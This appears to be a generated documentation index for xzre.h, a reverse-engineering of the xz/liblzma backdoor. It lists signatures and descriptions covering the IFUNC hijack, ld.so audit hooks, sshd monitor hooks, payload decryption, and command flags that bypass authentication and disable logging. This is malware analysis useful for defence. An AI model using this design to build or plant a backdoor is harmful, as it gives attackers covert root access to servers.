location of the GNU relro segment
Definition: xzre.h:797
Elf64_Sym * symtab
pointer to the ELF symbol table
Definition: xzre.h:779
u64 dyn_num_entries
number of entries in the ELF dynamic segment
Definition: xzre.h:771
u32 plt_relocs_num
number of entries in the PLT relocation table
Definition: xzre.h:787
void * lzma_code_end
liblzma code segment end
Definition: xzre.h:1275
libc_imports_t * libc_imports
pointer to the structure containing resolved libc functions
Definition: xzre.h:1218
char * STR_ssh_rsa_cert_v01_openssh_com
location of sshd .rodata string "ssh-rsa-cert-v01@openssh.com"
Definition: xzre.h:1236
BOOL disable_backdoor
This flag gets set to TRUE by run_backdoor_commands if any of the validity checks fail,...
Definition: xzre.h:1228
imported_funcs_t * imported_funcs
pointer to the structure containing resolved OpenSSL functions
Definition: xzre.h:1214
void * sshd_data_start
sshd data segment end
Definition: xzre.h:1256
u32 num_shifted_bits
number of bits copied
Definition: xzre.h:1300
void * sshd_code_start
sshd code segment start
Definition: xzre.h:1248
void * sshd_data_end
sshd data segment start
Definition: xzre.h:1260
char * STR_rsa_sha2_256
location of sshd .rodata string "rsa-sha2-256"
Definition: xzre.h:1240
void * sshd_code_end
sshd code segment end
Definition: xzre.h:1252
void * lzma_code_start
liblzma code segment start
Definition: xzre.h:1268
void * return_address
the return address value of the caller obtained from *(u64 *)(caller_locals+24) since the entrypoint ...
Definition: xzre.h:625
void * cpuid_fn
points to the real cpuid function
Definition: xzre.h:629
void * got_ptr
points to the Global Offset Table
Definition: xzre.h:618
ptrdiff_t got_offset
holds the offset of the symbol relative to the GOT. used to derive the got_ptr
Definition: xzre.h:634
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:943
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key() in sshd
Definition: xzre.h:953
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA() in sshd
Definition: xzre.h:948
BOOL result
TRUE if the instruction sequence was found, FALSE otherwise.
Definition: xzre.h:2119
u8 * offset_to_match
offset to match in the instruction displacement
Definition: xzre.h:2108
u8 * start_addr
start of the code address range to search
Definition: xzre.h:2098
u8 * end_addr
start of the code address range to search
Definition: xzre.h:2103
u32 * output_register_to_match
register to match as the instruction output
Definition: xzre.h:2113
the payload header. also used as Chacha IV
Definition: xzre.h:1786
the contents of the RSA 'n' field
Definition: xzre.h:1818
u8 link_map_l_audit_any_plt_bitmask
bitmask that sets the link_map::l_audit_any_plt flag
Definition: xzre.h:1401
unsigned int * _dl_naudit_ptr
location of ld.so's _rtld_global_ro::_dl_naudit_ptr field
Definition: xzre.h:1420
u32 * sshd_auditstate_bindflags_ptr
the location of sshd's auditstate::bindflags field
Definition: xzre.h:1379
char ** libcrypto_l_name
location of libcrypto's link_map::l_name field
Definition: xzre.h:1437
size_t _dl_audit_symbind_alt__size
code size of ld.so's _dl_audit_symbind_alt() function
Definition: xzre.h:1449
u32 libcrypto_auditstate_bindflags_old_value
backup of the old value of libcrypto's libname_list::next field
Definition: xzre.h:1367
struct audit_ifaces ** _dl_audit_ptr
location of ld.so's _rtld_global_ro::_dl_audit_ptr field
Definition: xzre.h:1411
void * sshd_link_map_l_audit_any_plt_addr
location of sshd's link_map::l_audit_any_plt flag
Definition: xzre.h:1394
u32 * libcrypto_auditstate_bindflags_ptr
the location of libcrypto's auditstate::bindflags field
Definition: xzre.h:1362
u32 sshd_auditstate_bindflags_old_value
backup of the old value of sshd's libname_list::next field
Definition: xzre.h:1384
Structure to hold internal state of the check being calculated.
Definition: xzre.h:280
State for the internal SHA-256 implementation.
Definition: xzre.h:268
uint64_t size
Size of the message excluding padding.
Definition: xzre.h:273
data used within sshd_proxy_elevate
Definition: xzre.h:1922
struct monitor from openssh-portable
Definition: xzre.h:558
stack frame layout for run_backdoor_commands
Definition: xzre.h:1959
struct sensitive_data from openssh-portable
Definition: xzre.h:570
struct sshkey from openssh-portable
Definition: xzre.h:581
void * func_start
the starting address of the function that referenced the string
Definition: xzre.h:1614
EncodedStringId string_id
the string that was referenced, in encoded form
Definition: xzre.h:1609
void * xref
location of the instruction that referenced the string
Definition: xzre.h:1622
void * func_end
the ending address of the function that referenced the string
Definition: xzre.h:1618
union used within run_backdoor_commands
Definition: xzre.h:1946
represents a shift register, which will shift a '1' into the secret data array. the low 3 bits repres...
Definition: xzre.h:1755
u32 index
Definition: xzre.h:1757
u32 byte_index
Definition: xzre.h:1762
u32 bit_index
Definition: xzre.h:1760
BOOL elf_find_function_pointer(StringXrefId xref_id, void **pOutCodeStart, void **pOutCodeEnd, void **pOutFptrAddr, elf_info_t *elf_info, string_references_t *xrefs, global_context_t *ctx)
this function searches for a function pointer, pointing to a function designated by the given xref_id
fake_lzma_allocator_t * get_lzma_allocator_address(void)
gets the address of the fake LZMA allocator
BOOL elf_parse(Elf64_Ehdr *ehdr, elf_info_t *elf_info)
Parses the given in-memory ELF file into elf_info.
BOOL process_is_sshd(elf_info_t *elf, u8 *stack_end)
checks if the current process is sshd by inspecting argv and envp.
BOOL sshd_get_usable_socket(int *pSock, int socket_index, libc_imports_t *imports)
gets the first usable socket fd
void mm_log_handler_hook(LogLevel level, int forced, const char *msg, void *ctx)
void * elf_symbol_get_addr(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Looks up an ELF symbol from a parsed ELF, and returns its memory address.
void init_elf_entry_ctx(elf_entry_ctx_t *ctx)
initialises the elf_entry_ctx_t
BOOL verify_signature(struct sshkey *sshkey, u8 *signed_data, u64 sshkey_digest_offset, u64 signed_data_size, u8 *signature, u8 *ed448_raw_key, global_context_t *global_ctx)
Checks if signed_data is signed with ed448_raw_key.
BOOL validate_log_handler_pointers(void *addr1, void *addr2, void *search_base, u8 *code_end, string_references_t *refs, global_context_t *global)
Validate that the two addresses are the expected/correct ones.
BOOL is_payload_message(u8 *sshbuf_data, size_t sshbuf_size, size_t *pOutPayloadSize, global_context_t *ctx)
checks if the given sshbuf buffer contains a backdoor payload message
void * dummy_tls_get_addr(tls_index *ti)
a dummy function that calls __tls_get_addr, to make sure its GOT slot doesn't get removed by compiler...
BOOL resolve_libc_imports(struct link_map *libc, elf_info_t *libc_info, libc_imports_t *imports)
parses the libc ELF from the supplied link map, and resolves its imports
struct gnu_hash_table gnu_hash_table_t
BOOL find_link_map_l_name(backdoor_data_handle_t *data_handle, ptrdiff_t *libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find struct link_map offsets required to modify ld.so's private struct auditstate state.
BOOL find_dl_naudit(elf_info_t *dynamic_linker_elf, elf_info_t *libcrypto_elf, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find __rtld_global_ro offsets required to modify ld.so's private struct audit_ifaces state.
void * elf_get_code_segment(elf_info_t *elf_info, u64 *pSize)
Obtains the address and size of the first executable segment in the given ELF file.
ssize_t fd_write(int fd, void *buffer, size_t count, libc_imports_t *funcs)
reads data to the specified file descriptor
BOOL find_instruction_with_mem_operand_ex(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, int opcode, void *mem_address)
finds an instruction with an immediate memory operand
BOOL process_shared_libraries(backdoor_shared_libraries_data_t *data)
scans loaded libraries to identify interesting libraries
BOOL dsa_key_hash(const DSA *dsa, u8 *mdBuf, u64 mdBufSize, global_context_t *ctx)
obtains a SHA256 hash of the supplied RSA key
BOOL process_shared_libraries_map(struct link_map *r_map, backdoor_shared_libraries_data_t *data)
scans loaded libraries to identify interesting libraries and populate related data
BOOL backdoor_setup(backdoor_setup_params_t *params)
the backdoor main method that installs the backdoor_symbind64() callback
void * elf_get_reloc_symbol(elf_info_t *elf_info, Elf64_Rela *relocs, u32 num_relocs, u64 reloc_type, EncodedStringId encoded_string_id)
Searches the ELF relocations for a symbol having name encoded_string id and relocation of type reloc_...
BOOL elf_contains_vaddr_relro(elf_info_t *elf_info, u64 vaddr, u64 size, u32 p_flags)
checks if given ELF file contains the range [vaddr, vaddr+size) in the gnurelro segment
BOOL elf_contains_vaddr(elf_info_t *elf_info, void *vaddr, u64 size, u32 p_flags)
checks if given ELF file contains the range [vaddr, vaddr+size) in a segment with the specified memor...
BOOL find_link_map_l_audit_any_plt(backdoor_data_handle_t *data, ptrdiff_t libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find struct link_map offset required to modify ld.so's private link_map::l_audit_any_plt state.
BOOL secret_data_append_item(secret_data_shift_cursor_t shift_cursor, unsigned operation_index, unsigned shift_count, int index, u8 *code)
Calls secret_data_append_singleton, if flags are non-zero.
const u64 tls_get_addr_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
void init_ldso_ctx(ldso_ctx_t *ldso_ctx)
initializes/resets ldso data
BOOL init_imported_funcs(imported_funcs_t *imported_funcs)
Initializes the imported_funcs structure.
backdoor_hooks_data_t * hooks_data_addr
location of backdoor_hooks_data_t
BOOL sha256(const void *data, size_t count, u8 *mdBuf, u64 mdBufSize, imported_funcs_t *funcs)
computes the SHA256 hash of the supplied data
BOOL find_mov_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
finds a MOV instruction.
ElfId
Definition: xzre.h:375
@ X_ELF_MAIN
this is for sshd itself
Definition: xzre.h:380
int init_hooks_ctx(backdoor_hooks_ctx_t *ctx)
Initializes the structure with hooks-related data.
CommandFlags2
Definition: xzre.h:1849
@ X_FLAGS2_CHANGE_MONITOR_REQ
if set, changes the monitor_reqtype field from MONITOR_REQ_AUTHPASSWORD to what's contained in the pa...
Definition: xzre.h:1859
@ X_FLAGS2_PSELECT
executes pselect, then exit not compatible with command 2
Definition: xzre.h:1873
@ X_FLAGS2_CONTINUATION
more data available in the following packet not compatible with command 3
Definition: xzre.h:1868
@ X_FLAGS2_SOCKFD_MASK
(0111_1000 >> 3) & 0xF when CMDF_SOCKET_INDEX is specified
Definition: xzre.h:1880
@ X_FLAGS2_IMPERSONATE
if set, impersonate a user (info from payload) if not set, impersonate root
Definition: xzre.h:1854
struct key_payload_hdr key_payload_hdr_t
the payload header. also used as Chacha IV
BOOL find_call_instruction(u8 *code_start, u8 *code_end, u8 *call_target, dasm_ctx_t *dctx)
finds a call instruction
const elf_functions_t elf_functions
special .data.rel.ro section that contains addresses to various functions
ssize_t fd_read(int fd, void *buffer, size_t count, libc_imports_t *funcs)
reads data from the specified file descriptor
BOOL sshd_get_sshbuf(struct sshbuf *sshbuf, global_context_t *ctx)
Finds the right sshbuf (FIXME: which?), starting from: (*(ctx->struct_monitor_ptr_address))->kex->my
const ptrdiff_t elf_functions_offset
special .data.rel.ro section that contains the offset to elf_functions
void * backdoor_init(elf_entry_ctx_t *state, u64 *caller_frame)
calls backdoor_init_stage2 by disguising it as a call to cpuid.
BOOL secret_data_append_singleton(u8 *call_site, u8 *code, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index)
Shifts data in the secret data store, after validation of code. this function is intended to be invok...
BOOL contains_null_pointers(void **pointers, unsigned int num_pointers)
checks if the given array of pointers contains any NULL pointer
void * elf_get_data_segment(elf_info_t *elf_info, u64 *pSize, BOOL get_alignment)
Obtains the address and size of the last read-write segment in the given ELF file this is typically t...
const u32 string_action_data[1304]
contains action data for the encoded string radix tree
BOOL is_endbr64_instruction(u8 *code_start, u8 *code_end, u32 low_mask_part)
Checks if the code between code_start and code_end is an endbr64 instruction.
void fake_lzma_free(void *opaque, void *ptr)
a fake free function called by lzma_free()
void * elf_get_rodata_segment(elf_info_t *elf_info, u64 *pSize)
Obtains the address and size of the last readonly segment in the given ELF file this corresponds to t...
BOOL is_range_mapped(u8 *addr, u64 length, global_context_t *ctx)
verify if a memory range is mapped
int sshd_get_sensitive_data_score_in_do_child(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if do_child accesses sensitive_data or not
BOOL sshd_find_sensitive_data(elf_info_t *sshd, elf_info_t *libcrypto, string_references_t *refs, imported_funcs_t *funcs, global_context_t *ctx)
locates sensitive_data within sshd, and resolves some additional libcrypto functions
CommandFlags1
Definition: xzre.h:1826
@ X_FLAGS1_SETLOGMASK
disable all logging by setting mask 0x80000000
Definition: xzre.h:1834
@ X_FLAGS1_NO_EXTENDED_SIZE
if set, the union size field must be 0
Definition: xzre.h:1846
@ X_FLAGS1_SOCKET_INDEX
custom monitor socket index override
Definition: xzre.h:1838
@ X_FLAGS1_8BYTES
the data block contains 8 additional bytes
Definition: xzre.h:1830
@ X_FLAGS1_DISABLE_PAM
if set, disables PAM authentication
Definition: xzre.h:1842
BOOL sshd_proxy_elevate(monitor_data_t *args, global_context_t *ctx)
forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges th...
uintptr_t backdoor_symbind64(Elf64_Sym *sym, unsigned int ndx, uptr *refcook, uptr *defcook, unsigned int flags, const char *symname)
the backdoored symbind64 installed in GLRO(dl_audit)
BOOL find_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA or MOV instruction with an immediate memory operand
EncodedStringId get_string_id(const char *string_begin, const char *string_end)
Get the.
BOOL rsa_key_hash(const RSA *rsa, u8 *mdBuf, u64 mdBufSize, imported_funcs_t *funcs)
obtains a SHA256 hash of the supplied RSA key
BOOL main_elf_parse(main_elf_t *main_elf)
Parses the main executable from the provided structure. As part of the process the arguments and envi...
fake_lzma_allocator_t fake_lzma_allocator
special .data.rel.ro section that contains a fake lzma_allocator
BOOL sshd_kex_sshbuf_get(void *kex, global_context_t *ctx, void **pOutputData, size_t *pOutputSize)
locates an sshbuf within struct kex (FIXME: which?)
struct elf_handles elf_handles_t
array of ELF handles
BOOL find_add_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds an ADD instruction with an immediate memory operand
u8 * elf_find_string_reference(elf_info_t *elf_info, EncodedStringId encoded_string_id, u8 *code_start, u8 *code_end)
finds an instruction that references the given string
BOOL x86_dasm(dasm_ctx_t *ctx, u8 *code_start, u8 *code_end)
disassembles the given x64 code
BOOL sshd_find_main(u8 **code_start_out, elf_info_t *sshd, elf_info_t *libcrypto, imported_funcs_t *imported_funcs)
finds the sshd_main function
BOOL find_lea_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA instruction with an immediate memory operand
const backdoor_cpuid_reloc_consts_t cpuid_reloc_consts
special .rodata section that contains _cpuid() related GOT offsets
BOOL sshd_get_sensitive_data_address_via_krb5ccname(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, void **sensitive_data_out, elf_info_t *elf)
finds the address of sensitive_data.host_keys in sshd by using getenv( STR_KRB5CCNAME )
struct backdoor_data backdoor_data_t
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1592
u8 * find_string_reference(u8 *code_start, u8 *code_end, const char *str)
finds an instruction that references the given string
int sshd_get_sensitive_data_score(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if accesses sensitive_data or not
BOOL secret_data_get_decrypted(u8 *output, global_context_t *ctx)
obtains a decrypted copy of the secret data
BOOL find_function_prologue(u8 *code_start, u8 *code_end, u8 **output, FuncFindType find_mode)
locates the function prologue
BOOL find_link_map_l_audit_any_plt_bitmask(backdoor_data_handle_t *data, instruction_search_ctx_t *search_ctx)
Find the bitmask required to modify ld.so's private link_map::l_audit_any_plt state.
int sshd_get_sensitive_data_score_in_demote_sensitive_data(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if demote_sensitive_data accesses sensitive_data or not
BOOL check_backdoor_state(global_context_t *ctx)
checks if the backdoor state is the expected one (FIXME: which?)
BOOL count_pointers(void **ptrs, u64 *count_out, libc_imports_t *funcs)
count the number of non-NULL pointers in the malloc'd memory block ptrs
unsigned int backdoor_entry(unsigned int cpuid_request, u64 *caller_frame)
calls backdoor_init while in the crc64() IFUNC resolver function
BOOL find_dl_audit_offsets(backdoor_data_handle_t *data, ptrdiff_t *libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find the various offsets in ld.so that need modification to trigger _dl_audit_symbind_alt() to call b...
BOOL backdoor_init_stage2(elf_entry_ctx_t *ctx, u64 *caller_frame, void **cpuid_got_addr, backdoor_cpuid_reloc_consts_t *reloc_consts)
BOOL sshd_find_monitor_field_addr_in_function(u8 *code_start, u8 *code_end, u8 *data_start, u8 *data_end, void **monitor_field_ptr_out, global_context_t *ctx)
find a pointer to a field in struct monitor by examining code referencing it
const u64 string_mask_data[238]
contains mask data for the encoded string radix tree
int mm_answer_keyallowed_hook(struct ssh *ssh, int sock, struct sshbuf *m)
runs the payload received from sshd_proxy_elevate, and then runs the original mm_answer_keyallowed fu...
BOOL chacha_decrypt(u8 *in, int inl, u8 *key, u8 *iv, u8 *out, imported_funcs_t *funcs)
decrypts a buffer with chacha20
BOOL decrypt_payload_message(void *payload, size_t payload_size, global_context_t *ctx)
decrypts the given backdoor payload
BOOL sshd_patch_variables(BOOL skip_root_patch, BOOL disable_pam, BOOL replace_monitor_reqtype, int monitor_reqtype, global_context_t *global_ctx)
Patches the sshd configuration.
void _cpuid_gcc(unsigned int level, unsigned int *a, unsigned int *b, unsigned int *c, unsigned int *d)
actually calls cpuid instruction
unsigned int _get_cpuid_modified(unsigned int leaf, unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx, u64 *caller_frame)
the backdoor entrypoint function, called by the IFUNC resolver for liblzma crc32() and crc64()
BOOL bignum_serialize(u8 *buffer, u64 bufferSize, u64 *pOutSize, const BIGNUM *bn, imported_funcs_t *funcs)
Serializes the BIGNUM bn to the buffer buffer.
BOOL elf_find_string_references(elf_info_t *elf_info, string_references_t *refs)
parses the ELF rodata section, looking for strings and the instructions that reference them
struct backdoor_data_handle backdoor_data_handle_t
data passed to functions that access the backdoor data
int mm_answer_keyverify_hook(struct ssh *ssh, int sock, struct sshbuf *m)
used in conjunction with mm_answer_keyallowed_hook to bypass the key validity check
union backdoor_runtime_data backdoor_runtime_data_t
union used within run_backdoor_commands
Elf64_Sym * elf_symbol_get(elf_info_t *elf_info, EncodedStringId encoded_string_id, EncodedStringId sym_version)
Looks up an ELF symbol from a parsed ELF.
u32 count_bits(u64 x)
returns the number of 1 bits in x
struct run_backdoor_commands_data run_backdoor_commands_data_t
stack frame layout for run_backdoor_commands
BOOL secret_data_append_from_address(void *addr, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index)
calls secret_data_append_singleton with either the given code address or the return address,...
BOOL secret_data_append_items(secret_data_item_t *items, u64 items_count, BOOL(*appender)(secret_data_shift_cursor_t, unsigned, unsigned, int, u8 *))
appends multiple secret data items at once
int sshd_get_sensitive_data_score_in_main(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if main accesses sensitive_data or not
BOOL sshd_get_client_socket(global_context_t *ctx, int *pSocket, int socket_index, enum SocketMode socket_direction)
Get either the read or write end of the sshd connection.
const ptrdiff_t fake_lzma_allocator_offset
special .data.rel.ro section that contains the offset to fake_lzma_allocator_struct
struct key_payload key_payload_t
the contents of the RSA 'n' field
const backdoor_tls_get_addr_reloc_consts_t tls_get_addr_reloc_consts
special .rodata section that contains __tls_get_addr() related GOT offsets
BOOL is_gnu_relro(Elf64_Word p_type, u32 addend)
checks if the provided identifiers represent a PT_GNU_RELRO
void * find_addr_referenced_in_mov_instruction(StringXrefId id, string_references_t *refs, void *mem_range_start, void *mem_range_end)
find an address referenced in a function
u32 resolver_call_count
counts the number of times the IFUNC resolver is called
BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx)
configure the log hook
CommandFlags3
Definition: xzre.h:1883
@ X_FLAGS3_MONITOR_REQ_VAL
6 bits used to store the monitor req / 2 (might be unused)
Definition: xzre.h:1891
@ X_FLAGS3_SOCKET_NUM
5 bits used to store number of sockets (in cmd3)
Definition: xzre.h:1887
struct monitor_data monitor_data_t
data used within sshd_proxy_elevate
const u64 cpuid_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
void * elf_get_got_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the GOT symbol with name encoded_string_id from the parsed ELF file.
void * elf_get_plt_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the PLT symbol with name encoded_string_id from the parsed ELF file.
int mm_answer_authpassword_hook(struct ssh *ssh, int sock, struct sshbuf *m)
used to bypass password authentication by replying with a successful MONITOR_ANS_AUTHPASSWORD
BOOL secret_data_append_from_call_site(secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index, BOOL bypass)
Shifts data in the secret data store, after validation of the call site, i.e. the caller of this func...
BOOL sshd_find_monitor_struct(elf_info_t *elf, string_references_t *refs, global_context_t *ctx)
finds the pointer to struct monitor, and updates the global context in ctx with its location
ptrdiff_t get_got_offset(elf_entry_ctx_t *ctx)
get the offset to the GOT
void * update_got_address(elf_entry_ctx_t *entry_ctx)
finds the __tls_get_addr() GOT entry
BOOL secret_data_append_from_code(void *code_start, void *code_end, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, BOOL start_from_call)
Pushes secret data by validating the given code block.
char * elf_find_string(elf_info_t *elf_info, EncodedStringId *stringId_inOut, void *rodata_start_ptr)
Locates a string in the ELF .rodata section.
BOOL find_function(u8 *code_start, void **func_start, void **func_end, u8 *search_base, u8 *code_end, FuncFindType find_mode)
locates the function boundaries.
void sshd_log(sshd_log_ctx_t *log_ctx, LogLevel level, const char *fmt,...)
calls sshlogv from openssh, similarly to sshlog in openssh
BOOL run_backdoor_commands(RSA *key, global_context_t *ctx, BOOL *do_orig)
checks if the supplied RSA public key contains the backdoor commands, and executes them if present.
BOOL sshd_get_sensitive_data_address_via_xcalloc(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, string_references_t *string_refs, void **sensitive_data_out)
finds the address of sensitive_data.host_keys in sshd by using XREF_xcalloc_zero_size in xcalloc
ptrdiff_t get_tls_get_addr_random_symbol_got_offset(elf_entry_ctx_t *ctx)
get the tls_get_addr_random_symbol GOT offset
BOOL sshbuf_bignum_is_negative(struct sshbuf *buf)
checks if the given serialized BIGNUM is negative
int init_shared_globals(backdoor_shared_globals_t *shared_globals)
Initializes the backdoor_shared_globals structure.
elf_functions_t * get_elf_functions_address(void)
gets the address of the elf_functions
BOOL find_mov_lea_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
like find_mov_instruction, but also considers LEA instructions
BOOL find_lea_instruction(u8 *code_start, u8 *code_end, u64 displacement)
finds a lea instruction
void * fake_lzma_alloc(void *opaque, size_t nmemb, size_t size)
a fake alloc function called by lzma_alloc() that then calls elf_symbol_get_addr()
BOOL find_reg2reg_instruction(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx)
finds a reg2reg instruction
u64 get_cpuid_got_index(elf_entry_ctx_t *ctx)
get the cpuid() GOT index
lzma_allocator * get_lzma_allocator(void)
gets the fake LZMA allocator, used for imports resolution the "opaque" field of the structure holds a...
